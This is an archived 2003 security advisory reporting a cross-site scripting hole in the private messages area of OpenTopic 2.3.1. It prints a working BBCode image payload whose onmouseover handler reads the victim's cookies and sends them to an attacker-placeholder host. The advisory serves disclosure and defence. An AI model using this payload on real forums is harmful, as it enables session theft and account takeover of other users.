TUCoPS :: Web :: General :: sb5904.htm

OpenTopic XSS (script injection) -> Cookies recovery
5th Jan 2003 [SBWID-5904]
COMMAND

	OpenTopic XSS (script injection) -> Cookies recovery

SYSTEMS AFFECTED

	OpenTopic Version : 2.3.1

PROBLEM

	Frog Man [leseulfrog@hotmail.com] found :
	
	 Location/Exploit :
	 °°°°°°°°°°°°°°°°°°
	
	The   XSS    hole    is    in    the    private    messages    area    (
	http://[target]/OpenTopic?a=ugtpc ).
	 XSS to get cookie :
	
	[IMG]http://[website]/img.gif"width="750"height="750"onmouseover="a=document['coo'+'kie'];location='http://[attacker]/?'+a;[/IMG]
	
	
	 More details about XSS :
	 °°°°°°°°°°°°°°°°°°°°°°°°
	
	In French :
	
	 http://www.phpsecure.org/article/XSS.php
	

SOLUTION

	see [http://www.infopop.com]

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH